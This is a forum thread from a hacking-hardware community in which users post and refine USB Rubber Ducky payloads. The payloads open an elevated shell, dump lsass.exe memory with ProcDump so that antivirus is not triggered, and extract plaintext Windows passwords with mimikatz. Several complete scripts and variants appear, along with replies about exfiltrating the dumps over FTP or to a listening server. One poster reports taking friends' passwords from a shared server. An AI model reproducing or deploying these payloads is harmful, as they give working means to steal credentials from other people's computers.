Darren Kitchen Posted August 31, 2013 Share Posted August 31, 2013 Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/ This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe. While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus. Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the twin duck and the large'ish filesize of the .dmp (42 MB on my system) would it be possible to save it locally then "grep" the important (smaller?) bits out before transferring them over. REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card and save log file to disk *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp ENTER REM *** GTFO *** STRING exit ENTER REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> I'm also curious if a powershell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1 Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted September 1, 2013 Share Posted September 1, 2013 I took a stab at it and the following is what I came up with: The ducky starts an admin cmd prompt launches a powershell command that has been base64 encoded so it bypasses execution policy, and will dump the lsass process into c:\windows\temp\lsass.dmp. Once that is done it exits that shell (if the shell stays open nothing else can touch that file) and starts a new lower priv shell just to read the file and dump it to a listening server also all through powershell. The code is at https://github.com/b00stfr3ak/ducky_lsass_dump I plan on combining the scripts I have written into a better menu selection because they use a lot of the same code, but that will come in a week or two. Quote Link to comment Share on other sites More sharing options...
bwall Posted September 1, 2013 Share Posted September 1, 2013 I had posted a payload a while back here on the forums that made the current user attempt to send an NTLMv2 auth to a remote IP (kind of different but I figured it warranted a mention). The limitation would be that it only affects the current user and requires a remote server to grab the auth (https://github.com/bwall/BAMF/blob/master/IntegrationQueue/static/cifstrap.py Quote Link to comment Share on other sites More sharing options...
waddell Posted September 2, 2013 Share Posted September 2, 2013 (edited) I wrote the same thing but instead uploads to ftp server quietly in the background. You may want to make a rule for windows firewall with netsh first. Not sure if this would set off AV or not, but you only have to plug the ducky in long enough to write the files and start the process. After uploading it literally deletes itself. https://forums.hak5.org/index.php?/topic/30160-payload-ftp-lsass-grab/ Are you only interested in doing this through external storage? If not, you may consider using your exfiltration to backup the dump file remotely once it's created. Also, you can send commands to mimikatz, might look like this (change dmp file name if needed): mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" Edited September 2, 2013 by waddell Quote Link to comment Share on other sites More sharing options...
Jonny190 Posted September 6, 2013 Share Posted September 6, 2013 My duck encoder 2.6 wont encode the "|" sybbol correctly, im in the uk but ive also tried the us language as well but when the duck is entering the symbol its displays empty in uk and as a "^" in us and help would be great Quote Link to comment Share on other sites More sharing options...
nickfrosty Posted September 6, 2013 Share Posted September 6, 2013 To help speed up the transfer speed, you could use a normal flash drive instead of a twin duck. The script will look for any drive labeled "DUCKY", so simply label your normal flash drive to "DUCKY" and either don't use the twin duck firmware or don't label the mass storage drive of the twin duck something else. Then when you run the payload, just make sure your normal flash drive is plugged in first and the drivers for it are loaded. Then you are good to go! Quote Link to comment Share on other sites More sharing options...
parkour86 Posted September 6, 2013 Share Posted September 6, 2013 (edited) I can't get mimikatz to read the passwords from the dmp file I created from my second computer. It keeps showing the password for the computer I'm on. Here's the steps I did: mimikatz.exe sekurlsa::minidump lsass.dmp privilege::debug sekurlsa::logonPasswords full Any help would be great. Thanks Edit: I found the problem. I'm suppose to use the x64 version under the Alpha directory and not under the root directory. Plus it's in English which helps a lot. Edited September 6, 2013 by parkour86 Quote Link to comment Share on other sites More sharing options...
parkour86 Posted September 7, 2013 Share Posted September 7, 2013 Anyone know how the lsass.exe file works? I was able to get mine and one of my friends passwords using the payload on a server we all use but was unable to get my other friends. Does the lsass some how erase the password cache after some time? Using powershell I was able to tell that the lsass.exe has been running since the beginning of August which is when the server was last rebooted. Thanks. Quote Link to comment Share on other sites More sharing options...
no42 Posted September 7, 2013 Share Posted September 7, 2013 My duck encoder 2.6 wont encode the "|" sybbol correctly, im in the uk but ive also tried the us language as well but when the duck is entering the symbol its displays empty in uk and as a "^" in us and help would be great thats very odd, as it works fine for me. As I'm temporarily residing in the UK at the moment. Run this through the encoder, it will help be debug your problem. DELAY 2000 STRING qwertyuiopasdfghjklzxcvbnm DELAY 500 ENTER STRING QWERTYUIOPASDFGHJKZXCVBNM DELAY 500 ENTER STRING 1234567890-= DELAY 500 ENTER STRING !"£$%^&*()_+ DELAY 500 ENTER STRING `[];'#,./ DELAY 500 ENTER STRING ~{}:@~|<>? \ | DELAY 500 ENTER STRING € ENTER Quote Link to comment Share on other sites More sharing options...
tom564 Posted September 7, 2013 Share Posted September 7, 2013 (edited) thats very odd, as it works fine for me. As I'm temporarily residing in the UK at the moment. Run this through the encoder, it will help be debug your problem. DELAY 2000 STRING qwertyuiopasdfghjklzxcvbnm DELAY 500 ENTER STRING QWERTYUIOPASDFGHJKZXCVBNM DELAY 500 ENTER STRING 1234567890-= DELAY 500 ENTER STRING !"£$%^&*()_+ DELAY 500 ENTER STRING `[];'#,./ DELAY 500 ENTER STRING ~{}:@~|<>? \ | DELAY 500 ENTER STRING € ENTER I am also in the UK and just ran that using duck encoder 2.6 with -l uk qwertyuiopasdfghjklzxcvbnm QWERTYUIOPASDFGHJKZXCVBNM 1234567890-= !"$%^&*()_+ `[];,./ ~{}:@~<>? € it appears that several symbols don't show up Edited September 7, 2013 by tom564 Quote Link to comment Share on other sites More sharing options...
no42 Posted September 8, 2013 Share Posted September 8, 2013 (edited) aah, when you use -l uk, your using the built in language map that may be slightly older. Update the SVN repository and try: java -jar encoder.jar -l resources\gb.properties -i input.txt -o inject.bin I've changed some of the country codes to ISO-3166-1 to avoid confusion as the Ducky hits worldwide (UK is Ukraine); GB is Great Britain following ISO-3166-1 compliance. Otherwise the new gb.properties file can be downloaded from here: gb.properties Edited September 8, 2013 by midnitesnake Quote Link to comment Share on other sites More sharing options...
tom564 Posted September 8, 2013 Share Posted September 8, 2013 aah, when you use -l uk, your using the built in language map that may be slightly older. Update the SVN repository and try: java -jar encoder.jar -l resources\gb.properties -i input.txt -o inject.bin I've changed some of the country codes to ISO-3166-1 to avoid confusion as the Ducky hits worldwide (UK is Ukraine); GB is Great Britain following ISO-3166-1 compliance. Otherwise the new gb.properties file can be downloaded from here: gb.properties Thanks, it now works fine for me. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 11, 2013 Author Share Posted September 11, 2013 Some helpful comments from YouTube regarding this script: put 7-zip (7za.exe) on duck, execute it (not will be picked up by antivirus for sure) and than copy compressed file to duck i expect thous dump to compress pretty well ;-) using 7zip max compression gets the size down to 10MB so it will reduce the time by 1/3. Quote Link to comment Share on other sites More sharing options...
DyFukA Posted September 12, 2013 Share Posted September 12, 2013 (edited) This seems to working the best for me. I've got it down to about 1:10 on my computer. 7z format works the best as far as speed and size. Not really sure what else can be done. Any ideas? REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from: REM http://www.7-zip.org/download.html REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit ENTER REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> Edited September 12, 2013 by DyFukA Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted September 13, 2013 Share Posted September 13, 2013 Or you can try a tool called Mpress. I use a Teensy board which only has 128K of memory. Using Mpress I got mimikatz down from 134K to 61K. Still runs perfectly, I've encountered no execution issues whatsoever. Works with Win32+ binaries as well, so you get 64-Bit support too. Quote Link to comment Share on other sites More sharing options...
Hackman1970 Posted September 18, 2013 Share Posted September 18, 2013 (edited) I had problems with norwegian keybords and this key ^ so I did som changes in the code to make it work in norwegian. First i tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE, did not work for me. Instead of using no.properties I use US standard and make computer change from norwegian to us english. Have tested this on my Norwegian Windows 7 x64, worked perfect for me :) Probably the way to go insted of dk.properties an se.properties to? Check out my modified code: REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip REM REM Modified to circumvent norwegian keyboards by Hackman1970 REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from: REM http://www.7-zip.org/download.html REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r REM *** Input Lanugage Swap to circumvent problmes with norwegian REM *** Norwegian Windows 7 use to have US english as second language installed by default REM *** Using shortcut ALT-SHIFT to troggle between NO and US ALT-SHIFT DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 REM *** For norwegian I tried to change y[es] to j[a] REM ALT y REM ALT j REM *** The abowe did not work but LEFTARROW ENTER works :) LEFTARROW ENTER DELAY 500 REM *** Swap Input Lanugage again for cmd.exe shell ALT-SHIFT DELAY 200 REM *** Define DUCKY drive as %duck% ENTER STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit ENTER REM *** Swap Input Lanugage again hopefully back to norwegian ALT-SHIFT REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:) REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> Is this the way to go or have anyone fix for no.properties? Edited September 18, 2013 by Hackman1970 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.